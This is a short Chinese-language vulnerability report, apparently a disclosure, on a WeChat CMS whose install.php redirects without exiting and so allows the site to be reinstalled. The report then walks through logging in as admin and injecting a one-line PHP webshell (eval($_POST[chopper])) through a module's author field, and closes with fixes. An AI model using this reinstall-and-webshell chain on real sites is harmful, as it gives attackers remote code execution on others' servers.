2014-08-23 21:25
http://www./源码下载,量还是挺大的。验证为v0.52,漏洞应该是版本通杀。
http://bbs./forum.php?mod=viewthread&tid=1155
在/install.php文件中26~28行代码如下:
if(file_exists(IA_ROOT . '/data/install.lock') && $action != 'finish') {
header('location: ./index.php');
}
如果满足条件,则跳转到index.php,但header并没有阻止程序继续往下执行。通过构造post包,可以实现整站重装。
http://127.0.0.1/weixin/member.php?act=login&
admin/111111进行登录,在全局设置---模块管理---模块设计中添加一个新的模块
在作者框内填写一句话木马*/eval($_POST[chopper]);/*,生成模块模板
webshell地址:
http://127.0.0.1/weixin/source/modules/test/module.php
漏洞证明:如上 修复方案:1.安装完后自动删除install.php文件,或满足条件处跳转后退出;
2.sql注入处正确过滤。
|